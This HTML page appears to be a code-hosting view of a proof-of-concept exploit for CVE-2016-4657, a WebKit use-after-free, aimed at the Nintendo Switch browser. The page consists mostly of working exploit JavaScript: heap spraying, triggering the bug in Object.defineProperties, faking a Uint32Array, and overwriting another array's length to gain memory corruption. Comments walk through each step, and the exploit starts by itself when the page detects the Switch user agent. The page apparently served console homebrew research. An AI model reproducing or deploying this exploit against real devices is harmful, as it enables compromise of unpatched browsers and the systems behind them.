218 lines
No EOL
10 KiB
HTML
218 lines
No EOL
10 KiB
HTML
<!doctype html>
|
|
<html>
|
|
<head>
|
|
<title>CVE-2016-4657 Switch PoC</title>
|
|
<style>
|
|
body {font-size: 2em;}
|
|
a {text-decoration: none; color: #000;}
|
|
a:hover {color: #f00; font-weight: bold;}
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<h1>CVE-2016-4657 Nintendo Switch PoC</h1>
|
|
<ul>
|
|
<li><a href=\'javascript:go();\'> go!</a></li>
|
|
<li><a href=\'javascript:document.location.reload();\'> reload</a></li>
|
|
</ul>
|
|
<div id=\'status\'> waiting... click go.</div>
|
|
|
|
<script>
|
|
// display JS errors as alerts. Helps debugging.
|
|
window.onerror = function(error, url, line) {
|
|
alert(error+\' URL:\'+url+\' L:\'+line);
|
|
};
|
|
</script>
|
|
<script>
|
|
|
|
// based on jbme.qwertyoruiop.com
|
|
// Thanks to:
|
|
// + qwertyoruiop
|
|
// + Retr0id
|
|
// + Ando
|
|
//
|
|
// saelo\'s phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html
|
|
|
|
// garbage collection stuff
|
|
var pressure = new Array(100);
|
|
// do garbage collect
|
|
dgc = function() {
|
|
for (var i = 0; i < pressure.length; i++) {
|
|
pressure[i] = new Uint32Array(0x10000);
|
|
}
|
|
for (var i = 0; i < pressure.length; i++) {
|
|
pressure[i] = 0;
|
|
}
|
|
}
|
|
|
|
|
|
// access to the overlapping Uint32Array
|
|
var bufs = new Array(0x1000);
|
|
// we will modify the vector of this
|
|
var smash = new Uint32Array(0x10);
|
|
// the array with the stale pointer
|
|
var stale = 0;
|
|
|
|
var _dview = null;
|
|
// write 2x 32bit in a DataView and get the Float representation of it
|
|
function u2d(low, hi) {
|
|
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
|
|
_dview.setUint32(0, hi);
|
|
_dview.setUint32(4, low);
|
|
return _dview.getFloat64(0);
|
|
}
|
|
|
|
function go_() {
|
|
// check if the length of the array smash changed already. if yes, bail out.
|
|
if (smash.length != 0x10) return;
|
|
|
|
// garbage collect
|
|
dgc();
|
|
|
|
// new array with 0x100 elements
|
|
var arr = new Array(0x100);
|
|
|
|
// new array buffer of length 0x1000
|
|
var yolo = new ArrayBuffer(0x1000);
|
|
|
|
// populate the arr with pointer to yolo and a number. not quite sure why.
|
|
arr[0] = yolo;
|
|
arr[1] = 0x13371337;
|
|
|
|
// create an object whos toString function returns number 10 and messes with arr.
|
|
var not_number = {};
|
|
not_number.toString = function() {
|
|
arr = null;
|
|
props[\"stale\"][\"value\"] = null;
|
|
|
|
// if bufs is already overlapping memory, bail out.
|
|
if (bufs[0]) return 10;
|
|
// really make sure garbage is collected
|
|
// the array pointed at by arr should be gone now.
|
|
for (var i = 0; i < 20; i++) {
|
|
dgc();
|
|
}
|
|
// for the whole buf Array
|
|
for (i = 0; i < bufs.length; i++) {
|
|
// fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier
|
|
bufs[i] = new Uint32Array(0x100 * 2)
|
|
// for each element of that array
|
|
for (k = 0; k < bufs[i].length;) {
|
|
// set memory to 0x41414141 0xffff0000
|
|
// basically spraying the JSValue 0xffff000041414141
|
|
// which is the Integer 0x41414141
|
|
// phrack: Integer FFFF:0000:IIII:IIII
|
|
bufs[i][k++] = 0x41414141;
|
|
bufs[i][k++] = 0xffff0000;
|
|
}
|
|
}
|
|
return 10;
|
|
};
|
|
// define a new object with some properties
|
|
var props = {
|
|
p0: { value: 0 },
|
|
p1: { value: 1 },
|
|
p2: { value: 2 },
|
|
p3: { value: 3 },
|
|
p4: { value: 4 },
|
|
p5: { value: 5 },
|
|
p6: { value: 6 },
|
|
p7: { value: 7 },
|
|
p8: { value: 8 },
|
|
// the length of this object is set to this object that does evil stuff with toString()
|
|
length: { value: not_number },
|
|
// the reference to the arr array. Which will later be freed.
|
|
stale: { value: arr },
|
|
after: { value: 666 }
|
|
};
|
|
// define a new target array
|
|
var target = [];
|
|
|
|
// TRIGGER BUG!
|
|
// set the properties of the target based on the previously defined ones
|
|
Object.defineProperties(target, props);
|
|
|
|
// get a reference to the target stale property, which points to arr
|
|
stale = target.stale;
|
|
|
|
// make sure that the stale[0] points actually to the 0x41414141 data if not, we don\'t wanna mess with it and try again
|
|
if(stale[0]==0x41414141) {
|
|
// stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242
|
|
stale[0] += 0x101;
|
|
//stale[0] = 0x41414242;
|
|
//document.getElementById(\'status\').innerText = \'bug done.\';
|
|
// searching the whole memory that is overlaying the old arr. Looking for 0x41414242
|
|
for (i = 0; i < bufs.length; i++) {
|
|
for (k = 0; k < bufs[0].length; k++) {
|
|
// Found the value! bufs[i][k] point now at the same memory as stale[0]
|
|
if (bufs[i][k] == 0x41414242) {
|
|
alert(\'Overlapping Arrays found at bufs[\'+i+\'][\'+k+\']\\nsmash.length is still: 0x\'+smash.length.toString(16));
|
|
|
|
// create a new object. Will look kinda like this:
|
|
// 0x0100150000000136 0x0000000000000000 <- fictional value
|
|
// 0x0000000000000064 0x0000000000000000 <- [\'a\'],[\'b\']
|
|
// 0x???????????????? 0x0000000000000100 <- [\'c\'],[\'d\']
|
|
stale[0] = {
|
|
\'a\': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array
|
|
\'b\': u2d(0, 0),
|
|
\'c\': smash, // var pointing at the struct of a Uint32Array(0x10)
|
|
\'d\': u2d(0x100, 0)
|
|
}
|
|
|
|
alert(\'created the JSObject.\\nstale[0] = \'+stale[0]);
|
|
|
|
// remember the original stale pointer, pointing at the object with the a,b,c,d properties
|
|
stale[1] = stale[0];
|
|
|
|
// now add 0x10 to the pointer of stale[0], which points now in the middle of the object.
|
|
bufs[i][k] += 0x10;
|
|
// check the type of stale[0].
|
|
|
|
// removed the loop because it makes the exploit sooooooo unreliable
|
|
// based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)
|
|
/*while(!(stale[0] instanceof Uint32Array)) {
|
|
// if stale[0] is not a Uint32Array yet, increment the structureID guess
|
|
structureID++;
|
|
|
|
// assign the next structureID to the original object still referenced by stale[1]
|
|
stale[1][\'a\'] = u2d(structureID, 0);
|
|
}*/
|
|
|
|
// Give some information. stale[0] should now be a Uint32Array
|
|
alert(\'misaligned the pointer to the JSObject.\\nstale[0] = \'+stale[0]+\'\');
|
|
|
|
// write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array
|
|
// which should point to the struct of smash, allowing us to overwrite the length of smash
|
|
stale[0][6] = 0x1337;
|
|
|
|
// check the length of smash is now.
|
|
alert(\'smash.length is now: 0x\'+smash.length.toString(16));
|
|
|
|
alert(\'done!\\nswitch will probably crash now :O\');
|
|
return;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
document.getElementById(\'status\').innerText = \' fail. refresh the page and try again...\';
|
|
setTimeout(function() {document.location.reload();}, 1000);
|
|
}
|
|
|
|
function go() {
|
|
document.getElementById(\'status\').innerText = \' go! \';
|
|
dgc();
|
|
dgc();
|
|
dgc();
|
|
dgc();
|
|
dgc();
|
|
dgc();
|
|
setTimeout(go_, 500);
|
|
}
|
|
|
|
// if Switch browser is detected, auto start exploit
|
|
if(navigator.userAgent.indexOf(\'Nintendo Switch\')>-1) {
|
|
document.getElementById(\'status\').innerText = \'Found Nintendo Switch! \';
|
|
setTimeout(go, 2000);
|
|
}
|
|
</script>
|
|
</body>
|
|
</html> |